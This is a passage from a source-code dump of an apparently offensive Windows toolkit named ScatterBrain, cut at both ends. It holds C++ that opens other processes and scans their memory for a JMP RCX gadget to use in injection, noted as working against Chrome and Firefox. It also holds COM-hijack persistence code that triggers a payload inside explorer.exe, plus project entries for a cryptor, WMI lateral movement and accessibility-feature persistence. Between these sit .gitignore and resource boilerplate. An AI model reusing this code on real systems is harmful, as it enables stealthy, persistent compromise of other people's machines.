110 | // Needs more testing and only really useful on certain binaries.
111 | // I know Chrome and FireFox work for sure but others are questionable.
112 | int FindRetGadget(wchar_t* binaryName, void** retGadget, int pid)
113 | {
114 | //int pid = 11744; // temp for testing
115 | char buffer[4096];
116 | SIZE_T bytesWritten = 0, bytesRead = 0;
117 | HANDLE threadHandle;
118 | DWORD i = 0, j = 0, threadId = 0;
119 |
120 | HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
121 | if (processHandle == INVALID_HANDLE_VALUE || processHandle == NULL) {
122 | printf("[X] Error: Could not open process with PID %d\n", pid);
123 | return NULL;
124 | }
125 |
126 | char* base = (char*)LoadLibrary(binaryName);
127 | if (base == NULL)
128 | {
129 | wprintf(L"[X] Could not load %s.\n", binaryName);
130 | return NULL;
131 | }
132 |
133 | ifstream file(binaryName, ios::in | ios::binary | ios::ate);
134 | int fileSize = 0;
135 | if (file.is_open())
136 | {
137 | file.seekg(0, ios::end);
138 | fileSize = file.tellg();
139 | file.close();
140 | }
141 |
142 | if (fileSize == 0)
143 | {
144 | printf("[X] Could not open file to determine size.\n");
145 | return 1;
146 | }
147 |
148 | wprintf(L"Size of %s is %d\n", binaryName, fileSize);
149 | // Hunting for a JMP RCX (\xff\xe1) instruction
150 | for (i = 0; i < fileSize && *retGadget == NULL; i += bytesRead) {
151 | printf("[*] Hunting for gadget at address %p\n", (char *)base + i);
152 | ReadProcessMemory(processHandle, (char *)base + i, buffer, 4096, &bytesRead);
153 | for (j = 0; j + 1 < bytesRead && *retGadget == NULL; j++) {
154 | if (buffer[j] == '\xff' && buffer[j + 1] == '\xe1') {
155 | //printf("[+] Found retGadget!\n");
156 | *retGadget = (char *)base + i + j;
157 | }
158 | }
159 | }
160 | if (*retGadget == NULL) {
161 | printf("[X] Error: Could not find JMP gadget\n");
162 | return 1;
163 | }
164 | wprintf(L"[*] Found JMP RCX gadget at address %p for %s\n", *retGadget, binaryName);
165 | return 0;
166 | }
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 | # Visual Studio 2015 cache/options directory
27 | .vs/
28 | # Uncomment if you have tasks that create the project's static files in wwwroot
29 | #wwwroot/
30 |
31 | # MSTest test Results
32 | [Tt]est[Rr]esult*/
33 | [Bb]uild[Ll]og.*
34 |
35 | # NUNIT
36 | *.VisualState.xml
37 | TestResult.xml
38 |
39 | # Build Results of an ATL Project
40 | [Dd]ebugPS/
41 | [Rr]eleasePS/
42 | dlldata.c
43 |
44 | # .NET Core
45 | project.lock.json
46 | project.fragment.lock.json
47 | artifacts/
48 | **/Properties/launchSettings.json
49 |
50 | *_i.c
51 | *_p.c
52 | *_i.h
53 | *.ilk
54 | *.meta
55 | *.obj
56 | *.pch
57 | *.pdb
58 | *.pgc
59 | *.pgd
60 | *.rsp
61 | *.sbr
62 | *.tlb
63 | *.tli
64 | *.tlh
65 | *.tmp
66 | *.tmp_proj
67 | *.log
68 | *.vspscc
69 | *.vssscc
70 | .builds
71 | *.pidb
72 | *.svclog
73 | *.scc
74 |
75 | # Chutzpah Test files
76 | _Chutzpah*
77 |
78 | # Visual C++ cache files
79 | ipch/
80 | *.aps
81 | *.ncb
82 | *.opendb
83 | *.opensdf
84 | *.sdf
85 | *.cachefile
86 | *.VC.db
87 | *.VC.VC.opendb
88 |
89 | # Visual Studio profiler
90 | *.psess
91 | *.vsp
92 | *.vspx
93 | *.sap
94 |
95 | # TFS 2012 Local Workspace
96 | $tf/
97 |
98 | # Guidance Automation Toolkit
99 | *.gpState
100 |
101 | # ReSharper is a .NET coding add-in
102 | _ReSharper*/
103 | *.[Rr]e[Ss]harper
104 | *.DotSettings.user
105 |
106 | # JustCode is a .NET coding add-in
107 | .JustCode
108 |
109 | # TeamCity is a build add-in
110 | _TeamCity*
111 |
112 | # DotCover is a Code Coverage Tool
113 | *.dotCover
114 |
115 | # Visual Studio code coverage results
116 | *.coverage
117 | *.coveragexml
118 |
119 | # NCrunch
120 | _NCrunch_*
121 | .*crunch*.local.xml
122 | nCrunchTemp_*
123 |
124 | # MightyMoose
125 | *.mm.*
126 | AutoTest.Net/
127 |
128 | # Web workbench (sass)
129 | .sass-cache/
130 |
131 | # Installshield output folder
132 | [Ee]xpress/
133 |
134 | # DocProject is a documentation generator add-in
135 | DocProject/buildhelp/
136 | DocProject/Help/*.HxT
137 | DocProject/Help/*.HxC
138 | DocProject/Help/*.hhc
139 | DocProject/Help/*.hhk
140 | DocProject/Help/*.hhp
141 | DocProject/Help/Html2
142 | DocProject/Help/html
143 |
144 | # Click-Once directory
145 | publish/
146 |
147 | # Publish Web Output
148 | *.[Pp]ublish.xml
149 | *.azurePubxml
150 | # TODO: Comment the next line if you want to checkin your web deploy settings
151 | # but database connection strings (with potential passwords) will be unencrypted
152 | *.pubxml
153 | *.publishproj
154 |
155 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
156 | # checkin your Azure Web App publish settings, but sensitive information contained
157 | # in these scripts will be unencrypted
158 | PublishScripts/
159 |
160 | # NuGet Packages
161 | *.nupkg
162 | # The packages folder can be ignored because of Package Restore
163 | **/packages/*
164 | # except build/, which is used as an MSBuild target.
165 | !**/packages/build/
166 | # Uncomment if necessary however generally it will be regenerated when needed
167 | #!**/packages/repositories.config
168 | # NuGet v3's project.json files produces more ignoreable files
169 | *.nuget.props
170 | *.nuget.targets
171 |
172 | # Microsoft Azure Build Output
173 | csx/
174 | *.build.csdef
175 |
176 | # Microsoft Azure Emulator
177 | ecf/
178 | rcf/
179 |
180 | # Windows Store app package directories and files
181 | AppPackages/
182 | BundleArtifacts/
183 | Package.StoreAssociation.xml
184 | _pkginfo.txt
185 |
186 | # Visual Studio cache files
187 | # files ending in .cache can be ignored
188 | *.[Cc]ache
189 | # but keep track of directories ending in .cache
190 | !*.[Cc]ache/
191 |
192 | # Others
193 | ClientBin/
194 | ~$*
195 | *~
196 | *.dbmdl
197 | *.dbproj.schemaview
198 | *.jfm
199 | *.pfx
200 | *.publishsettings
201 | node_modules/
202 | orleans.codegen.cs
203 |
204 | # Since there are multiple workflows, uncomment next line to ignore bower_components
205 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
206 | #bower_components/
207 |
208 | # RIA/Silverlight projects
209 | Generated_Code/
210 |
211 | # Backup & report files from converting an old project file
212 | # to a newer Visual Studio version. Backup files are not needed,
213 | # because we have git ;-)
214 | _UpgradeReport_Files/
215 | Backup*/
216 | UpgradeLog*.XML
217 | UpgradeLog*.htm
218 |
219 | # SQL Server files
220 | *.mdf
221 | *.ldf
222 |
223 | # Business Intelligence projects
224 | *.rdl.data
225 | *.bim.layout
226 | *.bim_*.settings
227 |
228 | # Microsoft Fakes
229 | FakesAssemblies/
230 |
231 | # GhostDoc plugin setting file
232 | *.GhostDoc.xml
233 |
234 | # Node.js Tools for Visual Studio
235 | .ntvs_analysis.dat
236 |
237 | # Visual Studio 6 build log
238 | *.plg
239 |
240 | # Visual Studio 6 workspace options file
241 | *.opt
242 |
243 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
244 | *.vbw
245 |
246 | # Visual Studio LightSwitch build output
247 | **/*.HTMLClient/GeneratedArtifacts
248 | **/*.DesktopClient/GeneratedArtifacts
249 | **/*.DesktopClient/ModelManifest.xml
250 | **/*.Server/GeneratedArtifacts
251 | **/*.Server/ModelManifest.xml
252 | _Pvt_Extensions
253 |
254 | # Paket dependency manager
255 | .paket/paket.exe
256 | paket-files/
257 |
258 | # FAKE - F# Make
259 | .fake/
260 |
261 | # JetBrains Rider
262 | .idea/
263 | *.sln.iml
264 |
265 | # CodeRush
266 | .cr/
267 |
268 | # Python Tools for Visual Studio (PTVS)
269 | __pycache__/
270 | *.pyc
271 |
272 | # Cake - Uncomment if you are using it
273 | # tools/
274 |
275 | ScatterBrain/RawData.h
276 | DWELLS/data1.bin
277 | **/*.dll
278 | *.dll
279 | **/*.exe
280 | **/RawData.h
281 | **/*.bin
282 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\ScatterBrain.dll;System.Byte[], mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 | ..\Resources\ScatterBrain.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
123 |
124 |
--------------------------------------------------------------------------------
/ScatterBrain.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28010.2026
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScatterBrain", "ScatterBrain\ScatterBrain.vcxproj", "{B59D77D7-D8DB-45DB-9B1F-0795FA32459C}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Cryptor", "Cryptor\Cryptor.csproj", "{D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpWMI", "SharpWMI\SharpWMI\SharpWMI.csproj", "{6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}"
11 | ProjectSection(ProjectDependencies) = postProject
12 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
13 | EndProjectSection
14 | EndProject
15 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DWELLS", "DWELLS\DWELLS.vcxproj", "{E6331C54-4C87-41EE-AE06-8B47AC7D9306}"
16 | ProjectSection(ProjectDependencies) = postProject
17 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
18 | EndProjectSection
19 | EndProject
20 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AccessibilityFeaturesPersistence", "AccessibilityFeaturesPersistence\AccessibilityFeaturesPersistence.csproj", "{558CF1E0-1983-4BF3-81CE-961058ACE7C0}"
21 | ProjectSection(ProjectDependencies) = postProject
22 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C} = {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
23 | EndProjectSection
24 | EndProject
25 | Global
26 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
27 | Debug|Any CPU = Debug|Any CPU
28 | Debug|x64 = Debug|x64
29 | Debug|x86 = Debug|x86
30 | Release|Any CPU = Release|Any CPU
31 | Release|x64 = Release|x64
32 | Release|x86 = Release|x86
33 | EndGlobalSection
34 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
35 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|Any CPU.ActiveCfg = Debug|Win32
36 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x64.ActiveCfg = Debug|x64
37 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x64.Build.0 = Debug|x64
38 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x86.ActiveCfg = Debug|Win32
39 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Debug|x86.Build.0 = Debug|Win32
40 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|Any CPU.ActiveCfg = Release|Win32
41 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x64.ActiveCfg = Release|x64
42 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x64.Build.0 = Release|x64
43 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x86.ActiveCfg = Release|Win32
44 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}.Release|x86.Build.0 = Release|Win32
45 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
46 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|Any CPU.Build.0 = Debug|Any CPU
47 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x64.ActiveCfg = Debug|Any CPU
48 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x64.Build.0 = Debug|Any CPU
49 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x86.ActiveCfg = Debug|Any CPU
50 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Debug|x86.Build.0 = Debug|Any CPU
51 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|Any CPU.ActiveCfg = Release|Any CPU
52 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|Any CPU.Build.0 = Release|Any CPU
53 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x64.ActiveCfg = Release|Any CPU
54 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x64.Build.0 = Release|Any CPU
55 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x86.ActiveCfg = Release|Any CPU
56 | {D3CB84FF-065E-4F2B-8C35-E5CA0103EAB5}.Release|x86.Build.0 = Release|Any CPU
57 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
58 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.Build.0 = Debug|Any CPU
59 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x64.ActiveCfg = Debug|Any CPU
60 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x64.Build.0 = Debug|Any CPU
61 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x86.ActiveCfg = Debug|Any CPU
62 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|x86.Build.0 = Debug|Any CPU
63 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.ActiveCfg = Release|Any CPU
64 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.Build.0 = Release|Any CPU
65 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x64.ActiveCfg = Release|Any CPU
66 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x64.Build.0 = Release|Any CPU
67 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x86.ActiveCfg = Release|Any CPU
68 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|x86.Build.0 = Release|Any CPU
69 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|Any CPU.ActiveCfg = Debug|Win32
70 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x64.ActiveCfg = Debug|x64
71 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x64.Build.0 = Debug|x64
72 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x86.ActiveCfg = Debug|Win32
73 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Debug|x86.Build.0 = Debug|Win32
74 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|Any CPU.ActiveCfg = Release|Win32
75 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x64.ActiveCfg = Release|x64
76 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x64.Build.0 = Release|x64
77 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x86.ActiveCfg = Release|Win32
78 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}.Release|x86.Build.0 = Release|Win32
79 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
80 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|Any CPU.Build.0 = Debug|Any CPU
81 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x64.ActiveCfg = Debug|Any CPU
82 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x64.Build.0 = Debug|Any CPU
83 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x86.ActiveCfg = Debug|Any CPU
84 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Debug|x86.Build.0 = Debug|Any CPU
85 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|Any CPU.ActiveCfg = Release|Any CPU
86 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|Any CPU.Build.0 = Release|Any CPU
87 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x64.ActiveCfg = Release|Any CPU
88 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x64.Build.0 = Release|Any CPU
89 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x86.ActiveCfg = Release|Any CPU
90 | {558CF1E0-1983-4BF3-81CE-961058ACE7C0}.Release|x86.Build.0 = Release|Any CPU
91 | EndGlobalSection
92 | GlobalSection(SolutionProperties) = preSolution
93 | HideSolutionNode = FALSE
94 | EndGlobalSection
95 | GlobalSection(ExtensibilityGlobals) = postSolution
96 | SolutionGuid = {C9F20C8F-7983-40D3-8807-0486ECB12484}
97 | EndGlobalSection
98 | EndGlobal
99 |
--------------------------------------------------------------------------------
/ScatterBrain/Persistence.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "scatterbrain.h"
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | using namespace std;
12 |
13 | #define MAX_KEY_LENGTH 255
14 | #define MAX_VALUE_NAME 16383
15 |
16 | EXTERN_C IMAGE_DOS_HEADER __ImageBase;
17 |
18 | typedef unsigned __int64 QWORD;
19 |
20 | bool IsHostPersistenceHost()
21 | {
22 | HANDLE hSnapshot;
23 | PROCESSENTRY32 pe32;
24 | DWORD pid = GetCurrentProcessId();
25 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
26 | if (hSnapshot == INVALID_HANDLE_VALUE) return FALSE;
27 |
28 | ZeroMemory(&pe32, sizeof(pe32));
29 | pe32.dwSize = sizeof(pe32);
30 | if (!Process32First(hSnapshot, &pe32)) return FALSE;
31 |
32 | do
33 | {
34 | if (pid == pe32.th32ProcessID)
35 | {
36 | if (wcsstr(pe32.szExeFile, L"verclsid.exe") || wcsstr(pe32.szExeFile, L"explorer.exe"))
37 | {
38 | return TRUE;
39 | }
40 | return FALSE;
41 | }
42 | } while (Process32Next(hSnapshot, &pe32));
43 | return FALSE;
44 | }
45 |
46 | // Main worker function that determines the CLSID
47 | // the dll is loaded from then begins execution.
48 | void QueryCLSIDKeys(HKEY hKey)
49 | {
50 | TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
51 | DWORD cbName; // size of name string
52 | TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name
53 | DWORD cchClassName = MAX_PATH; // size of class string
54 | DWORD cSubKeys = 0; // number of subkeys
55 | DWORD cbMaxSubKey; // longest subkey size
56 | DWORD cchMaxClass; // longest class string
57 | DWORD cValues; // number of values for key
58 | DWORD cchMaxValue; // longest value name
59 | DWORD cbMaxValueData; // longest value data
60 | DWORD cbSecurityDescriptor; // size of security descriptor
61 | FILETIME ftLastWriteTime; // last write time
62 |
63 | DWORD i, retCode;
64 |
65 | WCHAR currentDllPath[MAX_PATH] = { 0 };
66 | GetModuleFileNameW((HINSTANCE)&__ImageBase, currentDllPath, sizeof(currentDllPath));
67 |
68 | // Get the class name and the value count.
69 | retCode = RegQueryInfoKey(
70 | hKey, // key handle
71 | achClass, // buffer for class name
72 | &cchClassName, // size of class string
73 | NULL, // reserved
74 | &cSubKeys, // number of subkeys
75 | &cbMaxSubKey, // longest subkey size
76 | &cchMaxClass, // longest class string
77 | &cValues, // number of values for this key
78 | &cchMaxValue, // longest value name
79 | &cbMaxValueData, // longest value data
80 | &cbSecurityDescriptor, // security descriptor
81 | &ftLastWriteTime); // last write time
82 |
83 | // Enumerate the subkeys, until RegEnumKeyEx fails.
84 |
85 | if (cSubKeys)
86 | {
87 | // printf("\nNumber of subkeys: %d\n", cSubKeys);
88 |
89 | for (i = 0; i < cSubKeys; i++)
90 | {
91 | cbName = MAX_KEY_LENGTH;
92 | retCode = RegEnumKeyEx(hKey, i,
93 | achKey,
94 | &cbName,
95 | NULL,
96 | NULL,
97 | NULL,
98 | &ftLastWriteTime);
99 | if (retCode == ERROR_SUCCESS)
100 | {
101 | //_tprintf(TEXT("(%d) %s\n"), i + 1, achKey);
102 | WCHAR classGuidKey[MAX_VALUE_NAME];
103 | wsprintf(classGuidKey, L"Software\\Classes\\CLSID\\%s\\InprocServer32", achKey);
104 | //wprintf(L"Formatted new key: %s\n", classGuidKey);
105 | HKEY clsidKey;
106 | ZeroMemory(&clsidKey, sizeof(HKEY));
107 | if (RegOpenKeyEx(HKEY_CURRENT_USER,
108 | classGuidKey,
109 | 0,
110 | KEY_READ,
111 | &clsidKey) == ERROR_SUCCESS)
112 | {
113 | TCHAR achValue[MAX_VALUE_NAME];
114 | DWORD cchValue = MAX_VALUE_NAME;
115 | achValue[0] = '\0';
116 | DWORD size = MAX_PATH;
117 | WCHAR* dllPath = new WCHAR[MAX_PATH];
118 | retCode = RegEnumValue(clsidKey, 0,
119 | achValue,
120 | &cchValue,
121 | NULL,
122 | NULL,
123 | LPBYTE(dllPath),
124 | &size);
125 | if (retCode == ERROR_SUCCESS)
126 | {
127 | //wprintf(L"AchKey: %s\n", achKey);
128 | //wprintf(L"AchValue: %s\n", achValue);
129 | //wprintf(L"CLSID Dll path: %s\n", dllPath);
130 | //wprintf(L"Current DLL PATH: %s\n", currentDllPath);
131 | if (wcsstr(dllPath, currentDllPath))
132 | {
133 | // We've found the path. Retrieve date-time value.
134 | //printf("Dlls match!\n");
135 | TCHAR dateTimeValueName[9];
136 | wsprintf(dateTimeValueName, L"%s", L"DateTime");
137 | DWORD dtValueNameSize = sizeof(dateTimeValueName);
138 | DWORD dateTime;
139 | DWORD dateTimeSize = sizeof(DWORD);
140 | retCode = RegEnumValue(clsidKey, 3,
141 | dateTimeValueName,
142 | &dtValueNameSize,
143 | NULL,
144 | NULL,
145 | LPBYTE(&dateTime),
146 | &dateTimeSize);
147 | if (retCode == ERROR_SUCCESS)
148 | {
149 | //printf("Parsed datetime: %d\n", dateTime);
150 | DWORD uptime = GetTickCount();
151 | const BYTE* lpData = (BYTE*)malloc(sizeof(DWORD));
152 | memcpy((void*)lpData, &uptime, sizeof(DWORD));
153 | // Ensure DLL
154 | if (((uptime / 1000 / 60 / 60) - (dateTime / 1000 / 60 / 60)) > 1 ||
155 | dateTime == 0 ||
156 | uptime < dateTime)
157 | {
158 | // Make the dynamite go boom
159 | RegCloseKey(clsidKey);
160 | if (RegOpenKeyEx(HKEY_CURRENT_USER,
161 | classGuidKey,
162 | 0,
163 | KEY_WRITE,
164 | &clsidKey) == ERROR_SUCCESS)
165 | {
166 | retCode = RegSetValueEx(
167 | clsidKey,
168 | dateTimeValueName,
169 | NULL,
170 | REG_DWORD,
171 | lpData,
172 | sizeof(DWORD)
173 | );
174 | if (retCode == ERROR_SUCCESS)
175 | {
176 | MonsterMind();
177 | }
178 | }
179 | else
180 | {
181 |
182 | //printf("Failed to open key for writing.\n");
183 | }
184 | }
185 | else
186 | {
187 |
188 | }
189 |
190 | }
191 | else
192 | {
193 | // printf("Failed to parse datetime.\n");
194 | }
195 | // printf("%d\n", retCode);
196 | break;
197 | }
198 | }
199 | RegCloseKey(clsidKey);
200 | }
201 | }
202 | }
203 | }
204 | RegCloseKey(hKey);
205 | }
206 |
207 | void InitializeBootProceedure()
208 | {
209 | HKEY clsidKey;
210 | if (RegOpenKeyEx(HKEY_CURRENT_USER,
211 | TEXT("Software\\Classes\\CLSID"),
212 | 0,
213 | KEY_READ,
214 | &clsidKey) == ERROR_SUCCESS)
215 | {
216 | QueryCLSIDKeys(clsidKey);
217 | }
218 | }
--------------------------------------------------------------------------------
/ScatterBrain/Helpers.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include "Helpers.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | using namespace std;
16 |
17 | typedef std::basic_string tstring;
18 |
19 | template
20 | void rtrimws(basic_string& s, F f) {
21 |
22 | if (s.empty())
23 | return;
24 |
25 | typename basic_string::iterator p;
26 | for (p = s.end(); p != s.begin() && f(*--p););
27 |
28 | if (!f(*p))
29 | p++;
30 |
31 | s.erase(p, s.end());
32 | }
33 |
34 | // Overloads to make cleaner calling for client code
35 | void rtrimws(string& s) {
36 | rtrimws(s, isspace);
37 | }
38 |
39 | void rtrimws(wstring& ws) {
40 | rtrimws(ws, iswspace);
41 | }
42 |
43 | wchar_t* CharToWcharT(char* charString)
44 | {
45 | size_t sz = strlen(charString) + 1;
46 | wchar_t* path = new wchar_t[sz];
47 | MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, charString, sz, path, sz);
48 | return path;
49 | }
50 |
51 | //https://stackoverflow.com/questions/48345108/determine-all-posible-applications-to-open-a-file-with-delegateexecute?rq=1
52 | //wchar_t* GetDefaultHandlerForExtension(LPCTSTR extension)
53 | //{
54 | // IEnumAssocHandlers *pEnumHandlers = NULL;
55 | // if (SUCCEEDED(SHAssocEnumHandlers(extension, ASSOC_FILTER_RECOMMENDED, &pEnumHandlers)))
56 | // {
57 | // IAssocHandler *pAssocHandler = NULL;
58 | // while (S_OK == pEnumHandlers->Next(1, &pAssocHandler, NULL))
59 | // {
60 | // if (pAssocHandler != NULL)
61 | // {
62 | // LPWSTR pszName;
63 | // LPWSTR pszUIName;
64 | // LPWSTR ppszPath;
65 | // int pIndex;
66 | //
67 | // pAssocHandler->GetUIName(&pszName);
68 | // pAssocHandler->GetName(&pszUIName);
69 | // pAssocHandler->GetIconLocation(&ppszPath, &pIndex);
70 | // pAssocHandler->Release();
71 | // pAssocHandler = NULL;
72 | //
73 | // printf_s("%S \n", pszUIName);
74 | // printf_s("%S \n", pszName);
75 | // }
76 | // }
77 | // pEnumHandlers->Release();
78 | //
79 | // scanf_s("%S");
80 | // }
81 | // return NULL;
82 | //}
83 |
84 | bool FileExistsAndIs64Bit(wchar_t* fileName)
85 | {
86 | struct _stat buffer;
87 | if (_wstat(fileName, &buffer) == 0)
88 | {
89 | DWORD lpBinaryType;
90 | if (GetBinaryTypeW(fileName, &lpBinaryType) &&
91 | lpBinaryType == SCS_64BIT_BINARY)
92 | {
93 | wprintf(L"[*] %s exists and is 64-bit!\n", fileName);
94 | return TRUE;
95 | }
96 | }
97 | return FALSE;
98 |
99 | }
100 |
101 | bool FileExistsAndIs64Bit(char* fileName)
102 | {
103 | struct _stat buffer;
104 | if (_stat(fileName, &buffer) == 0)
105 | {
106 | DWORD lpBinaryType;
107 | if (GetBinaryTypeA(fileName, &lpBinaryType) &&
108 | lpBinaryType == SCS_64BIT_BINARY)
109 | {
110 | printf("[*] %s exists and is 64-bit!\n", fileName);
111 | return TRUE;
112 | }
113 | }
114 | return FALSE;
115 | }
116 |
117 | // Maps Volumes to disk paths
118 | PWCHAR GetVolumePaths(
